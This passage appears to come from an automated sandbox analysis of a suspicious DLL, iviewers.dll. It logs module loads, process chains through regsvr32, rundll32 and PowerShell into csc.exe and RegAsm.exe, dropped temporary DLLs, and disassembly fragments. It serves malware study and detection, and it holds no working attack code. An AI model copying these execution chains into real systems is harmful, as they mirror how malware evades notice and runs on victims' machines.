            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: iviewers.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: iviewers.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.pdb source: powershell.exe, 0000001B.00000002.1650397592.0000000004D20000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.pdb source: powershell.exe, 0000000F.00000002.1629065195.0000000006DEA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.pdb source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.pdb source: powershell.exe, 0000000F.00000002.1605796075.0000000004C02000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.pdb source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.pdb source: rundll32.exe, 00000005.00000002.1636762344.00000000051F1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.pdb source: regsvr32.exe, 00000004.00000002.1626426593.00000000046C1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.pdb@\ source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb source: powershell.exe, 00000014.00000002.1570488674.00000000055FD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.pdb source: rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb9&7v source: powershell.exe, 00000014.00000002.1579325198.00000000079E6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb8'8w source: powershell.exe, 00000014.00000002.1579325198.00000000079E6000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0374330D push ecx; iretd 13_2_037432FC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_037432DD push ecx; iretd 13_2_037432FC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_03743ACD push ebx; retf 13_2_03743ADA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh31_2_0043D812
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00443469 push ebp; iretd 31_2_0044346C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044366E push 9F00CD97h; ret 31_2_004436B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h31_2_0043AE3E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004477A5 push ebp; iretd 31_2_004477AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_011E754E pushad ; retf 35_2_011E756C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_011EB976 push esi; ret 35_2_011EB9D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_011EC7FA pushad ; retf 35_2_011EC827
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_011F8996 pushad ; retf 35_2_011F89B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B4B24 push esp; retf 41_2_010B4B29
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010BE9D7 push ds; retf 41_2_010BE9D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B52E0 pushfd ; iretd 41_2_010B52E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010BEDF7 push ds; retf 41_2_010BEDF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ACDB3 push ss; retf 41_2_010ACDB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ACCF6 push ss; retf 41_2_010ACDB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ED220 push eax; iretd 41_2_010ED221
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ED238 push eax; iretd 41_2_010ED239
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110E924 push edx; iretd 41_2_0110EA22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110CF54 push eax; iretd 41_2_0110CF55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110FFDA push eax; ret 41_2_01110119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110FE5D push eax; ret 41_2_01110119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_011137C1 pushad ; retf 41_2_011137DF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110CF68 push 680110CFh; iretd 41_2_0110CF6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010FCEB7 push eax; iretd 41_2_010FCF65
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dllJump to dropped file
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
